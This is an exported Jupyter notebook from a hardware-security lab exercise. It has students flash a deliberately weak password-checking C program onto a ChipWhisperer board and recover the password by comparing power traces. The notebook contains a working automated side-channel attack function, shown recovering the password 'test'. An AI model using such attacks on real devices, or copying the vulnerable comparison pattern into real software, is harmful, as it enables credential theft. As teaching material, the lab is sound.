# Attack a password check

#### Learning goals:
- Learn how a "bad" password check looks like
- Learn how to run code from C files on ChipWhisperer
- Learn how to read output from ChipWhisperer
- Learn how to exploit different program flows
- Learn how a SAD attack works

In [40]:
%load_ext autoreload
%autoreload 2

import os
from cwtoolbox import CaptureDevice

The autoreload extension is already loaded. To reload it, use:
  %reload_ext autoreload


## 1. Record traces from passwordcheck.c

In [135]:
capture_device = CaptureDevice.create("CWLITEXMEGA")
capture_device.compile(file=os.path.abspath("passwordcheck.c"))
capture_device.flash()

XMEGA Programming flash...
XMEGA Reading flash...
Verified flash OK, 2207 bytes


In [42]:
data = capture_device.capture(
    number_of_traces=1,
    number_of_samples=100,
    input=lambda _: 8 * [0],
)

100%|██████████| 1/1 [00:00<00:00, 27.15it/s]


<div style="border: 3px solid plum; border-radius: 5px; padding: 5px; width: calc(100% - 20px);">
<div class="h2" style="font-variant: all-small-caps;">Exercise 1</div>

1. Understand [passwordcheck.c](passwordcheck.c). What is `setup()`, `run()`, and `teardown()`?
2. Think about problems in this C code. 
   What happens if `input` smaller than the stored password?

</div>

1. 
2. out of bounds read

<div style="border: 3px solid plum; border-radius: 5px; padding: 5px; width: calc(100% - 20px);">
<div class="h2" style="font-variant: all-small-caps;">Exercise 2</div>

1. Record traces with different inputs.
2. Plot the recorded traces. Is there a difference?

</div>

In [36]:

password = 'infineon'

def generate_input(n):
    r = []
    for x in range(n):
        r.append(ord(password[x]))
    for x in range(n, len(password)):
        r.append(0)
    return r

print(generate_input(2))

[105, 110, 0, 0, 0, 0, 0, 0]


In [9]:
data = capture_device.capture(
    number_of_traces=8,
    number_of_samples=700,
    input=generate_input
)

100%|██████████| 8/8 [00:00<00:00, 141.72it/s]


In [10]:
import plotly.graph_objects as pgo
fig = pgo.Figure()
fig.add_trace(pgo.Scatter(y=data["trace"][2]))

In [11]:
import plotly.graph_objects as pgo
fig = pgo.Figure()
for x in range(0,8):
    fig.add_trace(pgo.Scatter(y=data["trace"][x] - 1 * x ))
fig.show()

In [142]:
import numpy as np
def crack_password():
    password = []
    while True:
        trace = capture_device.capture(
            number_of_traces=ord("~")-ord(" "),
            number_of_samples=200 + len(password) * 100,
            input=lambda i: password  + [ord(" ") + i],
        )["trace"]
        corr = np.corrcoef(trace)[0]
        idx = corr.argmin()
        if corr[idx] > 0.95:
            return password
        else:
            password = password + [idx + 0x20]
        print(f"Current Guess:{bytes(password)}")
    

In [143]:
bytes(crack_password()).decode()

100%|██████████| 94/94 [00:03<00:00, 29.33it/s]


Current Guess:b't'


100%|██████████| 94/94 [00:03<00:00, 29.61it/s]


Current Guess:b'te'


100%|██████████| 94/94 [00:03<00:00, 29.85it/s]


Current Guess:b'tes'


100%|██████████| 94/94 [00:03<00:00, 30.21it/s]


Current Guess:b'test'


100%|██████████| 94/94 [00:03<00:00, 29.73it/s]


'test'

<div style="border: 3px solid plum; border-radius: 5px; padding: 5px; width: calc(100% - 20px);">
<div class="h2" style="font-variant: all-small-caps;">Exercise 3</div>

Crack the password using the differences!

1. Write down the attack in pseudocode.
2. Implement an automated attack.

</div>

<div style="border: 3px solid plum; border-radius: 5px; padding: 5px; width: calc(100% - 20px);">
<div class="h2" style="font-variant: all-small-caps;">Exercise 4</div>

1. Change `stored_password` and download the program.
2. Exchange your ChipWhisperer with another student.
3. Can you crack the password of your colleague?

</div>